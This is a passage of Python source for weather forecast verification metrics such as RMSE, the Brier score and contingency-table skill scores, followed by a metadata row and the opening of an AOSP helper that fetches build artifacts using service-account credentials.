bias = np.mean(obs - fcst)
return np.mean((obs - fcst - bias) ** 2) ** 0.5
class Rmse(ObsFcstBased):
name = "Root mean squared error"
description = "Root mean squared error"
min = 0
perfect_score = 0
supports_aggregator = True
orientation = -1
def _compute_from_obs_fcst(self, obs, fcst):
return self.aggregator((obs - fcst) ** 2) ** 0.5
def label(self, variable):
return "RMSE (" + variable.units + ")"
class Rmsf(ObsFcstBased):
name = "Root mean squared factor"
description = "Root mean squared factor"
min = 0
perfect_score = 1
supports_aggregator = True
orientation = 0
def _compute_from_obs_fcst(self, obs, fcst):
return np.exp(self.aggregator((np.log(fcst / obs)) ** 2) ** 0.5)
def label(self, variable):
return "RMSF (" + variable.units + ")"
class Cmae(ObsFcstBased):
name = "Cube-root mean absolute cubic error"
description = "Cube-root mean absolute cubic error"
min = 0
perfect_score = 0
supports_aggregator = True
orientation = -1
def _compute_from_obs_fcst(self, obs, fcst):
return (self.aggregator(abs(obs ** 3 - fcst ** 3))) ** (1.0 / 3)
def label(self, variable):
return "CMAE (" + variable.units + ")"
class Nsec(ObsFcstBased):
name = "Nash-Sutcliffe efficiency coefficient"
description = "Nash-Sutcliffe efficiency coefficient"
min = 0
max = 1
perfect_score = 1
orientation = 1
def _compute_from_obs_fcst(self, obs, fcst):
meanobs = np.mean(obs)
num = np.sum((fcst - obs) ** 2)
denom = np.sum((obs - meanobs) ** 2)
if denom == 0:
return np.nan
else:
return 1 - num / denom
def label(self, variable):
return "NSEC"
class Alphaindex(ObsFcstBased):
name = "Alpha index"
description = "Alpha index"
perfect_score = 0
orientation = -1
max = 2
min = 0
def _compute_from_obs_fcst(self, obs, fcst):
meanobs = np.mean(obs)
meanfcst = np.mean(fcst)
num = np.sum((fcst - obs - meanfcst + meanobs) ** 2)
denom = np.sum((fcst - meanfcst) ** 2 + (obs - meanobs) ** 2)
if denom == 0:
return np.nan
else:
return 1 - num / denom
def label(self, variable):
return self.name
class Leps(ObsFcstBased):
name = "Linear error in probability space"
description = "Linear error in probability space"
min = 0
perfect_score = 0
orientation = -1
def _compute_from_obs_fcst(self, obs, fcst):
N = len(obs)
# Compute obs quantiles
Iobs = np.array(np.argsort(obs), 'float')
qobs = Iobs / N
# Compute the quantiles that the forecasts are relative
# to the observations
qfcst = np.zeros(N, 'float')
sortobs = np.sort(obs)
for i in range(0, N):
I = np.where(fcst[i] < sortobs)[0]
if len(I > 0):
qfcst[i] = float(I[0]) / N
else:
qfcst[i] = 1
return np.mean(abs(qfcst - qobs))
def label(self, variable):
return "LEPS"
class Dmb(ObsFcstBased):
name = "Degree of mass balance"
description = "Degree of mass balance (obs/fcst)"
perfect_score = 1
orientation = 0
def _compute_from_obs_fcst(self, obs, fcst):
return np.mean(obs) / np.mean(fcst)
def label(self, variable):
return self.description
class Mbias(ObsFcstBased):
name = "Multiplicative bias"
description = "Multiplicative bias (fcst/obs)"
perfect_score = 1
orientation = 0
def _compute_from_obs_fcst(self, obs, fcst):
num = np.nanmean(fcst)
denum = np.nanmean(obs)
if denum == 0:
return np.nan
return num / denum
def label(self, variable):
return self.description
class Corr(ObsFcstBased):
name = "Correlation"
description = "Correlation between observations and forecasts"
min = 0 # Technically -1, but values below 0 are not as interesting
max = 1
perfect_score = 1
orientation = 1
def _compute_from_obs_fcst(self, obs, fcst):
if len(obs) <= 1:
return np.nan
if np.var(fcst) == 0:
return np.nan
return np.corrcoef(obs, fcst)[1, 0]
def label(self, variable):
return self.name
class RankCorr(ObsFcstBased):
name = "Rank correlation"
description = "Rank correlation between observations and forecasts"
min = 0 # Technically -1, but values below 0 are not as interesting
max = 1
perfect_score = 1
orientation = 1
def _compute_from_obs_fcst(self, obs, fcst):
if len(obs) <= 1:
return np.nan
return scipy.stats.spearmanr(obs, fcst)[0]
def label(self, variable):
return self.name
class KendallCorr(ObsFcstBased):
name = "Kendall correlation"
description = "Kendall correlation between observations and forecasts"
min = 0 # Technically -1, but values below 0 are not as interesting
max = 1
perfect_score = 1
orientation = 1
def _compute_from_obs_fcst(self, obs, fcst):
if len(obs) <= 1:
return np.nan
if np.var(fcst) == 0:
return np.nan
return scipy.stats.kendalltau(obs, fcst)[0]
def label(self, variable):
return self.name
class DError(ObsFcstBased):
name = "Distribution Error"
description = "Distribution error"
min = 0
perfect_score = 0
supports_aggregator = False
orientation = -1
def _compute_from_obs_fcst(self, obs, fcst):
sortedobs = np.sort(obs)
sortedfcst = np.sort(fcst)
return np.mean(np.abs(sortedobs - sortedfcst))
class Pit(Metric):
""" Retrives the PIT-value corresponding to the observation """
type = verif.metric_type.Probabilistic()
name = "Probability integral transform"
description = "Verifying PIT-value (CDF at observation)"
supports_aggregator = True
orientation = 0
def compute_single(self, data, input_index, axis, axis_index, interval):
pit = data.get_scores(verif.field.Pit(), input_index, axis, axis_index)
return self.aggregator(pit)
def label(self, variable):
return self.aggregator.name().title() + " of verifying PIT"
class PitHistDev(Metric):
type = verif.metric_type.Probabilistic()
name = "PIT histogram deviation factor"
description = "PIT histogram deviation factor (actual deviation / expected deviation)"
min = 0
# max = 1
perfect_score = 1
orientation = -1
def __init__(self, numBins=11, field=verif.field.Pit()):
self._bins = np.linspace(0, 1, numBins)
self._field = field
def compute_single(self, data, input_index, axis, axis_index, interval):
pit = data.get_scores(self._field, input_index, axis, axis_index)
nb = len(self._bins) - 1
D = self.deviation(pit, nb)
D0 = self.expected_deviation(pit, nb)
dev = D / D0
return dev
def label(self, variable):
return self.name
@staticmethod
def expected_deviation(values, numBins):
if len(values) == 0 or numBins == 0:
return np.nan
return np.sqrt((1.0 - 1.0 / numBins) / (len(values) * numBins))
@staticmethod
def deviation(values, numBins):
if len(values) == 0 or numBins == 0:
return np.nan
x = np.linspace(0, 1, numBins + 1)
n = np.histogram(values, x)[0]
n = n * 1.0 / sum(n)
return np.sqrt(1.0 / numBins * np.sum((n - 1.0 / numBins) ** 2))
@staticmethod
def deviation_std(values, numBins):
if len(values) == 0 or numBins == 0:
return np.nan
n = len(values)
p = 1.0 / numBins
numPerBinStd = np.sqrt(n * p * (1 - p))
std = numPerBinStd / n
return std
# What reduction in ignorance is possible by calibrating the PIT-histogram?
@staticmethod
def ignorance_potential(values, numBins):
if len(values) == 0 or numBins == 0:
return np.nan
x = np.linspace(0, 1, numBins + 1)
n = np.histogram(values, x)[0]
n = n * 1.0 / sum(n)
expected = 1.0 / numBins
ign = np.sum(n * np.log2(n / expected)) / sum(n)
return ign
class PitHistSlope(Metric):
type = verif.metric_type.Probabilistic()
name = "PIT histogram slope"
description = "Average slope of the PIT histogram. Positive mean too many obs in the higher ranks."
perfect_score = 0
orientation = 0
def __init__(self, numBins=11, field=verif.field.Pit()):
self._bins = np.linspace(0, 1, numBins)
self._field = field
def compute_single(self, data, input_index, axis, axis_index, interval):
# Create a PIT histogram, then compute the average slope across the bars
pit = data.get_scores(self._field, input_index, axis, axis_index)
n = np.histogram(pit, self._bins)[0]
n = n * 1.0 / sum(n)
centers = (self._bins[1:] + self._bins[0:-1]) / 2
dx = np.diff(centers)
d = np.diff(n) / dx
return np.mean(d)
def label(self, variable):
return self.name
class PitHistShape(Metric):
type = verif.metric_type.Probabilistic()
name = "PIT histogram shape"
description = "Second derivative of the PIT histogram. Negative means U-shaped."
perfect_score = 0
orientation = 0
def __init__(self, numBins=11, field=verif.field.Pit()):
self._bins = np.linspace(0, 1, numBins)
self._field = field
def compute_single(self, data, input_index, axis, axis_index, interval):
# Create a PIT histogram, then compute the second derivative across the bars
pit = data.get_scores(self._field, input_index, axis, axis_index)
n = np.histogram(pit, self._bins)[0]
n = n * 1.0 / sum(n)
centers = (self._bins[1:] + self._bins[0:-1]) / 2
dx = np.diff(centers)
d = np.diff(n) / dx
centers2 = (centers[1:] + centers[0:-1]) / 2
dx2 = np.diff(centers2)
dd = np.diff(d) / dx2
return np.mean(dd)
def label(self, variable):
return self.name
class MarginalRatio(Metric):
type = verif.metric_type.Probabilistic()
name = "Marginal ratio"
description = "Ratio of marginal probability of obs to marginal" \
" probability of fcst. Use -r to specify thresholds."
min = 0
perfect_score = 1
require_threshold_type = "threshold"
supports_threshold = True
default_axis = verif.axis.Threshold()
orientation = 0
def compute_single(self, data, input_index, axis, axis_index, interval):
if np.isinf(interval.lower):
pvar = verif.field.Threshold(interval.upper)
[obs, p1] = data.get_scores([verif.field.Obs(), pvar], input_index, axis, axis_index)
p0 = 0 * p1
elif np.isinf(interval.upper):
pvar = verif.field.Threshold(interval.lower)
[obs, p0] = data.get_scores([verif.field.Obs(), pvar], input_index,
axis, axis_index)
p1 = 0 * p0 + 1
else:
pvar0 = verif.field.Threshold(interval.lower)
pvar1 = verif.field.Threshold(interval.upper)
[obs, p0, p1] = data.get_scores([verif.field.Obs(), pvar0, pvar1],
input_index, axis, axis_index)
obs = interval.within(obs)
p = p1 - p0
if np.mean(p) == 0:
return np.nan
return np.mean(obs) / np.mean(p)
def label(self, variable):
return "Ratio of marginal probs: Pobs/Pfcst"
class Within(Metric):
type = verif.metric_type.Deterministic()
""" Can't be a subclass of ObsFcstBased, because it depends on threshold
"""
name = "Within"
description = "The percentage of forecasts within some error bound. Use -r to specify error bounds"
min = 0
max = 100
default_bin_type = "below"
require_threshold_type = "threshold"
supports_threshold = True
perfect_score = 100
orientation = 0
def compute_single(self, data, input_index, axis, axis_index, interval):
[obs, fcst] = data.get_scores([verif.field.Obs(),
verif.field.Fcst()], input_index, axis, axis_index)
return self.compute_from_obs_fcst(obs, fcst, interval)
def compute_from_obs_fcst(self, obs, fcst, interval):
diff = abs(obs - fcst)
return np.mean(interval.within(diff)) * 100
def label(self, variable):
return "% of forecasts"
class Conditional(Metric):
"""
Computes the mean y conditioned on x. For a given range of x-values, what is
the average y-value?
"""
type = verif.metric_type.Deterministic()
orientation = 0
def __init__(self, x=verif.field.Obs(), y=verif.field.Fcst(), func=np.mean):
self._x = x
self._y = y
self._func = func
def compute_single(self, data, input_index, axis, axis_index, interval):
[obs, fcst] = data.get_scores([self._x, self._y], input_index, axis, axis_index)
return self.compute_from_obs_fcst(obs, fcst, interval)
def compute_from_obs_fcst(self, obs, fcst, interval):
I = np.where(interval.within(obs))[0]
if len(I) == 0:
return np.nan
return self._func(fcst[I])
class XConditional(Metric):
"""
Mean x when conditioned on x. Average x-value that is within a given range.
The reason the y-variable is added is to ensure that the same data is used
for this metric as for the Conditional metric.
"""
type = verif.metric_type.Deterministic()
orientation = 0
def __init__(self, x=verif.field.Obs(), y=verif.field.Fcst(), func=np.median):
self._x = x
self._y = y
self._func = func
def compute_single(self, data, input_index, axis, axis_index, interval):
[obs, fcst] = data.get_scores([self._x, self._y], input_index, axis, axis_index)
return self.compute_from_obs_fcst(obs, fcst, interval)
def compute_from_obs_fcst(self, obs, fcst, interval):
I = np.where(interval.within(obs))[0]
if len(I) == 0:
return np.nan
return self._func(obs[I])
class Count(Metric):
"""
Counts how many values of a specific variable is within the threshold range
Not a real metric.
"""
type = verif.metric_type.Deterministic()
orientation = 0
def __init__(self, x):
self._x = x
def compute_single(self, data, input_index, axis, axis_index, interval):
values = data.get_scores(self._x, input_index, axis, axis_index)
I = np.where(interval.within(values))[0]
if len(I) == 0:
return np.nan
return len(I)
class Quantile(Metric):
type = verif.metric_type.Probabilistic()
min = 0
max = 1
def __init__(self, quantile):
self._quantile = quantile
def compute_single(self, data, input_index, axis, axis_index, interval):
var = verif.field.Quantile(self._quantile)
scores = data.get_scores(var, input_index, axis, axis_index)
return verif.util.nanmean(scores)
class Bs(Metric):
type = verif.metric_type.Probabilistic()
name = "Brier score"
description = "Brier score"
min = 0
max = 1
default_axis = verif.axis.Threshold()
require_threshold_type = "threshold"
supports_threshold = True
perfect_score = 0
orientation = -1
reference = "Glenn W. Brier, 1950: Verification of forecasts expressed in terms of probability. Mon. Wea. Rev., 78, 1-3."
def compute_single(self, data, input_index, axis, axis_index, interval):
""" Compute probabilities based on thresholds """
[obsP, p] = get_p(data, input_index, axis, axis_index, interval)
return self.compute_from_obs_fcst(obsP, p)
def compute_from_obs_fcst(self, obs, fcst):
bs = np.nan * np.zeros(len(obs), 'float')
return np.nanmean((fcst-obs)**2)
def label(self, variable):
return self.name
class BsRel(Metric):
default_axis = verif.axis.Threshold()
type = verif.metric_type.Probabilistic()
name = "brier skill score, reliability term"
description = "Brier score, reliability term"
min = 0
max = 1
require_threshold_type = "threshold"
supports_threshold = True
perfect_score = 0
orientation = -1
def __init__(self, num_edges=11):
self._edges = np.linspace(0, 1, num_edges)
self._edges[-1] = 1.001
def compute_single(self, data, input_index, axis, axis_index, interval):
[obsP, p] = get_p(data, input_index, axis, axis_index, interval)
return self.compute_from_obs_fcst(obsP, p)
def compute_from_obs_fcst(self, obs, fcst):
bs = np.nan * np.zeros(len(fcst), 'float')
obs_mean = np.mean(obs)
"""
Break p into bins, and compute reliability. but save each reliability
value in an array the same size as fcst. In this way we do not need to do
a weighted average
"""
for i in range(0, len(self._edges) - 1):
I = np.where((fcst >= self._edges[i]) & (fcst < self._edges[i + 1]))[0]
if len(I) > 0:
obs_mean_I = np.mean(obs[I])
bs[I] = (fcst[I] - obs_mean_I) ** 2
return np.nanmean(bs)
def label(self, variable):
return self.name
class BsRes(Metric):
default_axis = verif.axis.Threshold()
type = verif.metric_type.Probabilistic()
name = "Brier score, resolution term"
description = "Brier score, resolution term"
min = 0
max = 1
require_threshold_type = "threshold"
supports_threshold = True
perfect_score = 1
orientation = 1
def __init__(self, num_edges=11):
self._edges = np.linspace(0, 1, num_edges)
self._edges[-1] = 1.001
def compute_single(self, data, input_index, axis, axis_index, interval):
[obsP, p] = get_p(data, input_index, axis, axis_index, interval)
return self.compute_from_obs_fcst(obsP, p)
def compute_from_obs_fcst(self, obs, fcst):
bs = np.nan * np.zeros(len(fcst), 'float')
obs_mean = np.mean(obs)
for i in range(0, len(self._edges) - 1):
I = np.where((fcst >= self._edges[i]) & (fcst < self._edges[i + 1]))[0]
if len(I) > 0:
obs_mean_I = np.mean(obs[I])
bs[I] = (obs_mean_I - obs_mean) ** 2
return np.nanmean(bs)
def label(self, variable):
return self.name
class BsUnc(Metric):
default_axis = verif.axis.Threshold()
type = verif.metric_type.Probabilistic()
name = "Brier score, uncertainty term"
description = "Brier score, uncertainty term"
min = 0
max = 1
require_threshold_type = "threshold"
supports_threshold = True
perfect_score = None
orientation = 0
def compute_single(self, data, input_index, axis, axis_index, interval):
[obsP, p] = get_p(data, input_index, axis, axis_index, interval)
return self.compute_from_obs_fcst(obsP, p)
def compute_from_obs_fcst(self, obs, fcst):
obs_mean = np.mean(obs)
bsunc = np.nanmean((obs_mean - obs)**2)
return bsunc
def label(self, variable):
return self.name
class Bss(Metric):
default_axis = verif.axis.Threshold()
type = verif.metric_type.Probabilistic()
name = "Brier skill score"
description = "Brier skill score"
min = 0
max = 1
require_threshold_type = "threshold"
supports_threshold = True
perfect_score = 1
orientation = 1
def compute_single(self, data, input_index, axis, axis_index, interval):
[obsP, p] = get_p(data, input_index, axis, axis_index, interval)
return self.compute_from_obs_fcst(obsP, p)
def compute_from_obs_fcst(self, obs, fcst):
bs = np.nanmean((fcst - obs)**2)
obs_mean = np.mean(obs)
bsunc = np.nanmean((obs_mean - obs)**2)
if bsunc == 0:
bss = np.nan
else:
bss = (bsunc - bs) / bsunc
return bss
def label(self, variable):
return self.name
class QuantileScore(Metric):
type = verif.metric_type.Probabilistic()
name = "Quantile score"
description = "Quantile score. Use -q to set which quantiles to use."
min = 0
require_threshold_type = "quantile"
supports_threshold = True
perfect_score = 0
orientation = -1
def compute_single(self, data, input_index, axis, axis_index, interval):
[obs, q] = get_q(data, input_index, axis, axis_index, interval)
qs = np.nan * np.zeros(len(q), 'float')
v = q - obs
qs = v * (interval.lower - (v < 0))
return np.mean(qs)
def label(self, variable):
return self.name
class Ign0(Metric):
type = verif.metric_type.Probabilistic()
name = "Binary ignorance"
description = "Ignorance of the binary probability based on threshold"
require_threshold_type = "threshold"
supports_threshold = True
orientation = -1
def compute_single(self, data, input_index, axis, axis_index, interval):
[obsP, p] = get_p(data, input_index, axis, axis_index, interval)
I0 = np.where(obsP == 0)[0]
I1 = np.where(obsP == 1)[0]
ign = -np.log2(p)
ign[I0] = -np.log2(1 - p[I0])
return np.mean(ign)
def label(self, variable):
return self.name
class Spherical(Metric):
type = verif.metric_type.Probabilistic()
name = "Spherical score"
description = "Spherical probabilistic scoring rule for binary events"
require_threshold_type = "threshold"
supports_threshold = True
max = 1
min = 0
perfect_score = 1
orientation = 1
def compute_single(self, data, input_index, axis, axis_index, interval):
[obsP, p] = get_p(data, input_index, axis, axis_index, interval)
I0 = np.where(obsP == 0)[0]
I1 = np.where(obsP == 1)[0]
sp = p / np.sqrt(p ** 2 + (1 - p) ** 2)
sp[I0] = (1 - p[I0]) / np.sqrt((p[I0]) ** 2 + (1 - p[I0]) ** 2)
return np.mean(sp)
def label(self, variable):
return self.name
class Contingency(Metric):
"""
Metrics based on 2x2 contingency table for a given interval. Observations
and forecasts are converted into binary values, that is if they are within
or not within an interval.
"""
type = verif.metric_type.Threshold()
min = 0
max = 1
default_axis = verif.axis.Threshold()
require_threshold_type = "deterministic"
supports_threshold = True
_usingQuantiles = False
def compute_from_abcd(self, a, b, c, d):
""" Compute the score given the 4 values in the 2x2 contingency table:
Arguments:
a (float): Hit
b (float): False alarm
c (float): Miss
d (float): Correct rejection
Returns:
float: The score
"""
raise NotImplementedError()
def label(self, variable):
return self.name
def compute_single(self, data, input_index, axis, axis_index, interval):
[obs, fcst] = data.get_scores([verif.field.Obs(), verif.field.Fcst()], input_index, axis, axis_index)
return self.compute_from_obs_fcst(obs, fcst, interval)
def _quantile_to_threshold(self, values, interval):
"""
Convert an interval of quantiles to interval thresholds, for example
converting [10%, 50%] of some precip values to [5 mm, 25 mm]
Arguments:
values (np.array): values to compute thresholds for
interval (verif.interval.Interval): interval of quantiles
Returns:
verif.interval.Interval: Interval of thresholds
"""
sorted = np.sort(values)
lower = -np.inf
upper = np.inf
if not np.isinf(abs(interval.lower)):
lower = np.percentile(sorted, interval.lower * 100)
if not np.isinf(abs(interval.lower)):
upper = np.percentile(sorted, interval.upper * 100)
return verif.interval.Interval(lower, upper, interval.lower_eq, interval.upper_eq)
def _compute_abcd(self, obs, fcst, interval, f_interval=None):
if f_interval is None:
f_interval = interval
value = np.nan
if len(fcst) > 0:
# Compute frequencies
if self._usingQuantiles:
fcstSort = np.sort(fcst)
obsSort = np.sort(obs)
f_qinterval = self._quantile_to_threshold(fcstSort, f_interval)
o_qinterval = self._quantile_to_threshold(obsSort, interval)
a = np.ma.sum(f_qinterval.within(fcst) & o_qinterval.within(obs)) # Hit
b = np.ma.sum(f_qinterval.within(fcst) & (o_qinterval.within(obs) == 0)) # FA
c = np.ma.sum((f_qinterval.within(fcst) == 0) & o_qinterval.within(obs)) # Miss
d = np.ma.sum((f_qinterval.within(fcst) == 0) & (o_qinterval.within(obs) == 0)) # CR
else:
a = np.ma.sum(f_interval.within(fcst) & interval.within(obs)) # Hit
b = np.ma.sum(f_interval.within(fcst) & (interval.within(obs) == 0)) # FA
c = np.ma.sum((f_interval.within(fcst) == 0) & interval.within(obs)) # Miss
d = np.ma.sum((f_interval.within(fcst) == 0) & (interval.within(obs) == 0)) # CR
return [a, b, c, d]
def compute_from_obs_fcst(self, obs, fcst, interval, f_interval=None):
""" Computes the score
Arguments:
obs (np.array): array of observations
fcst (np.array): array of forecasts
interval (verif.interval.Interval): compute score for this interval
f_interval (verif.interval.Interval): Use this interval for forecasts.
If None, then use the same interval for obs and forecasts.
Returns:
float: The score
"""
[a, b, c, d] = self._compute_abcd(obs, fcst, interval, f_interval)
value = self.compute_from_abcd(a, b, c, d)
if np.isinf(value):
value = np.nan
return value
def compute_from_obs_fcst_resample(self, obs, fcst, N, interval, f_interval=None):
"""
Same as compute_from_obs_fcst, except compute more robust scores by
resampling (with replacement) using the computed values of a, b, c, d.
Arguments:
obs (np.array): array of observations
fcst (np.array): array of forecasts
N (int): Resample this many times
interval (verif.interval.Interval): compute score for this interval
f_interval (verif.interval.Interval): Use this interval for forecasts.
If None, then use the same interval for obs and forecasts.
Returns:
float: The score
"""
[a, b, c, d] = self._compute_abcd(obs, fcst, interval, f_interval)
# Resample
n = a + b + c + d
np.random.seed(1)
value = 0
for i in range(0, N):
aa = np.random.binomial(n, 1.0*a/n)
bb = np.random.binomial(n, 1.0*b/n)
cc = np.random.binomial(n, 1.0*c/n)
dd = np.random.binomial(n, 1.0*d/n)
value = value + self.compute_from_abcd(aa, bb, cc, dd)
value = value / N
return value
def label(self, variable):
return self.name
class A(Contingency):
name = "Hit"
description = "Hit"
def compute_from_abcd(self, a, b, c, d):
return 1.0 * a / (a + b + c + d)
class B(Contingency):
name = "False alarm"
description = "False alarm"
def compute_from_abcd(self, a, b, c, d):
return 1.0 * b / (a + b + c + d)
class C(Contingency):
name = "Miss"
description = "Miss"
def compute_from_abcd(self, a, b, c, d):
return 1.0 * c / (a + b + c + d)
class D(Contingency):
name = "Correct rejection"
description = "Correct rejection"
def compute_from_abcd(self, a, b, c, d):
return 1.0 * d / (a + b + c + d)
class N(Contingency):
name = "Total cases"
description = "Total cases"
max = None
def compute_from_abcd(self, a, b, c, d):
return a + b + c + d
class Ets(Contingency):
name = "Equitable threat score"
description = "Equitable threat score"
perfect_score = 1
orientation = 1
def compute_from_abcd(self, a, b, c, d):
N = a + b + c + d
ar = (a + b) / 1.0 / N * (a + c)
if a + b + c - ar == 0:
return np.nan
return (a - ar) / 1.0 / (a + b + c - ar)
def label(self, variable):
return "ETS"
class FcstRate(Contingency):
name = "Forecast rate"
description = "Fractions of forecasts (a + b)"
perfect_score = None
orientation = 0
def compute_from_abcd(self, a, b, c, d):
return (a + b) / 1.0 / (a + b + c + d)
class Dscore(Contingency):
name = "Discimination"
description = "Generalized discrimination score"
perfect_score = 1
orientation = 1
reference = "Simon J. Mason and Andreas P. Weigel, 2009: A Generic Forecast Verification Framework for Administrative Purposes. Mon. Wea. Rev., 137, 331-349."
max = 1
min = 0
def compute_from_abcd(self, a, b, c, d):
N = a + b + c + d
num = a*d + 0.5*(a*b + c*d)
denom = (a + c) * (b + d)
if denom == 0:
return np.nan
return num / denom
class Threat(Contingency):
name = "Threat score"
description = "Threat score"
perfect_score = 1
orientation = 1
def compute_from_abcd(self, a, b, c, d):
if a + b + c == 0:
return np.nan
return a / 1.0 / (a + b + c)
class Pc(Contingency):
name = "Proportion correct"
description = "Proportion correct"
perfect_score = 1
orientation = 1
def compute_from_abcd(self, a, b, c, d):
return (a + d) / 1.0 / (a + b + c + d)
class Edi(Contingency):
name = "Extremal dependency index"
description = "Extremal dependency index"
perfect_score = 1
orientation = 1
reference = "Christopher A. T. Ferro and David B. Stephenson, 2011: Extremal Dependence Indices: Improved Verification Measures for Deterministic Forecasts of Rare Binary Events. Wea. Forecasting, 26, 699-713."
def compute_from_abcd(self, a, b, c, d):
N = a + b + c + d
if b + d == 0 or a + c == 0:
return np.nan
F = b / 1.0 / (b + d)
H = a / 1.0 / (a + c)
if H == 0 or F == 0:
return np.nan
denom = (np.log(H) + np.log(F))
if denom == 0:
return np.nan
return (np.log(F) - np.log(H)) / denom
def label(self, variable):
return "EDI"
class Sedi(Contingency):
name = "Symmetric extremal dependency index"
description = "Symmetric extremal dependency index"
perfect_score = 1
orientation = 1
reference = Edi.reference
def compute_from_abcd(self, a, b, c, d):
N = a + b + c + d
if b + d == 0 or a + c == 0:
return np.nan
F = b / 1.0 / (b + d)
H = a / 1.0 / (a + c)
if F == 0 or F == 1 or H == 0 or H == 1:
return np.nan
denom = np.log(F) + np.log(H) + np.log(1 - F) + np.log(1 - H)
if denom == 0:
return np.nan
num = np.log(F) - np.log(H) - np.log(1 - F) + np.log(1 - H)
return num / denom
def label(self, variable):
return "SEDI"
class Eds(Contingency):
name = "Extreme dependency score"
description = "Extreme dependency score"
min = None
perfect_score = 1
orientation = 1
reference = "Stephenson, D. B., B. Casati, C. A. T. Ferro, and C. A. Wilson, 2008: The extreme dependency score: A non-vanishing measure for forecasts of rare events. Meteor. Appl., 15, 41-50."
def compute_from_abcd(self, a, b, c, d):
N = a + b + c + d
if a + c == 0:
return np.nan
H = a / 1.0 / (a + c)
p = (a + c) / 1.0 / N
if H == 0 or p == 0:
return np.nan
denom = (np.log(p) + np.log(H))
if denom == 0:
return np.nan
return (np.log(p) - np.log(H)) / denom
def label(self, variable):
return "EDS"
class Seds(Contingency):
name = "Symmetric extreme dependency score"
description = "Symmetric extreme dependency score"
min = None
perfect_score = 1
orientation = 1
def compute_from_abcd(self, a, b, c, d):
N = a + b + c + d
if a + c == 0:
return np.nan
H = a / 1.0 / (a + c)
p = (a + c) / 1.0 / N
q = (a + b) / 1.0 / N
if q == 0 or H == 0:
return np.nan
denom = np.log(p) + np.log(H)
if denom == 0:
return np.nan
return (np.log(q) - np.log(H)) / (np.log(p) + np.log(H))
def label(self, variable):
return "SEDS"
class BiasFreq(Contingency):
name = "Bias frequency"
description = "Bias frequency (number of fcsts / number of obs)"
max = None
perfect_score = 1
orientation = 0
def compute_from_abcd(self, a, b, c, d):
if a + c == 0:
return np.nan
return 1.0 * (a + b) / (a + c)
class Hss(Contingency):
max = None
description = "Heidke skill score"
perfect_score = 1
orientation = 1
def compute_from_abcd(self, a, b, c, d):
denom = ((a + c) * (c + d) + (a + b) * (b + d))
if denom == 0:
return np.nan
return 2.0 * (a * d - b * c) / denom
class BaseRate(Contingency):
name = "Base rate"
description = "Base rate: Fraction of observations (a + c)"
perfect_score = None
orientation = 0
def compute_from_abcd(self, a, b, c, d):
if a + b + c + d == 0:
return np.nan
return (a + c) / 1.0 / (a + b + c + d)
class Or(Contingency):
name = "Odds ratio"
description = "Odds ratio"
max = None
perfect_score = None # Should be infinity
orientation = 1
def compute_from_abcd(self, a, b, c, d):
if b * c == 0:
return np.nan
return (a * d) / 1.0 / (b * c)
class Lor(Contingency):
name = "Log odds ratio"
description = "Log odds ratio"
max = None
perfect_score = None # Should be infinity
orientation = 1
def compute_from_abcd(self, a, b, c, d):
if a * d == 0 or b * c == 0:
return np.nan
return np.log((a * d) / 1.0 / (b * c))
class YulesQ(Contingency):
name = "Yule's Q"
description = "Yule's Q (Odds ratio skill score)"
perfect_score = 1
orientation = 1
def compute_from_abcd(self, a, b, c, d):
if a * d + b * c == 0:
return np.nan
return (a * d - b * c) / 1.0 / (a * d + b * c)
class Kss(Contingency):
name = "Hanssen-Kuiper skill score"
description = "Hanssen-Kuiper skill score"
perfect_score = 1
orientation = 1
reference = "Hanssen , A., W. Kuipers, 1965: On the relationship between the frequency of rain and various meteorological parameters. - Meded. Verh. 81, 2-15."
def compute_from_abcd(self, a, b, c, d):
if (a + c) * (b + d) == 0:
return np.nan
return (a * d - b * c) * 1.0 / ((a + c) * (b + d))
class Hit(Contingency):
name = "Hit rate"
description = "Hit rate (a.k.a. probability of detection)"
perfect_score = 1
orientation = 1
def compute_from_abcd(self, a, b, c, d):
if a + c == 0:
return np.nan
return a / 1.0 / (a + c)
class Miss(Contingency):
name = "Miss rate"
description = "Miss rate"
perfect_score = 0
orientation = -1
def compute_from_abcd(self, a, b, c, d):
if a + c == 0:
return np.nan
return c / 1.0 / (a + c)
# Fraction of non-events that are forecasted as events
class Fa(Contingency):
name = "False alarm rate"
description = "False alarm rate"
perfect_score = 0
orientation = -1
def compute_from_abcd(self, a, b, c, d):
if b + d == 0:
return np.nan
return b / 1.0 / (b + d)
# Fraction of forecasted events that are false alarms
class Far(Contingency):
name = "False alarm ratio"
description = "False alarm ratio"
perfect_score = 0
orientation = -1
def compute_from_abcd(self, a, b, c, d):
if a + b == 0:
return np.nan
return b / 1.0 / (a + b)
| [
"[email protected]"
] | |
e188217cf5dcdf7b3d1b7887be7a21f67e80e4ab | 544cfadc742536618168fc80a5bd81a35a5f2c99 | /tools/treble/fetcher/fetcher_lib.py | 0ec017318832788f675ab4ad2587b17824faa6f9 | [
"Apache-2.0"
] | permissive | ZYHGOD-1/Aosp11 | 0400619993b559bf4380db2da0addfa9cccd698d | 78a61ca023cbf1a0cecfef8b97df2b274ac3a988 | refs/heads/main | 2023-04-21T20:13:54.629813 | 2021-05-22T05:28:21 | 2021-05-22T05:28:21 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 8,512 | py | """Provides helper functions for fetching artifacts."""
import io
import os
import re
import sys
import sysconfig
import time
# This is a workaround to put '/usr/lib/python3.X' ahead of googleapiclient
# Using embedded_launcher won't work since py3-cmd doesn't contain _ssl module.
if sys.version_info.major == 3:
sys.path.insert(0, os.path.dirname(sysconfig.get_paths()['purelib']))
# pylint: disable=import-error,g-bad-import-order,g-import-not-at-top
import apiclient
from googleapiclient.discovery import build
from six.moves import http_client
import httplib2
from oauth2client.service_account import ServiceAccountCredentials
_SCOPE_URL = 'https://www.googleapis.com/auth/androidbuild.internal'
_DEF_JSON_KEYFILE = '.config/gcloud/application_default_credentials.json'
# 20 MB default chunk size -- used in Buildbot
_DEFAULT_CHUNK_SIZE = 20 * 1024 * 1024
# HTTP errors -- used in Builbot
_DEFAULT_MASKED_ERRORS = [404]
_DEFAULT_RETRIED_ERRORS = [503]
_DEFAULT_RETRIES = 10
def _create_http_from_p12(robot_credentials_file, robot_username):
"""Creates a credentialed HTTP object for requests.
Args:
robot_credentials_file: The path to the robot credentials file.
robot_username: A string containing the username of the robot account.
Returns:
An authorized httplib2.Http object.
"""
try:
credentials = ServiceAccountCredentials.from_p12_keyfile(
service_account_email=robot_username,
filename=robot_credentials_file,
scopes=_SCOPE_URL)
except AttributeError:
raise ValueError('Machine lacks openssl or pycrypto support')
http = httplib2.Http()
return credentials.authorize(http)
def _simple_execute(http_request,
masked_errors=None,
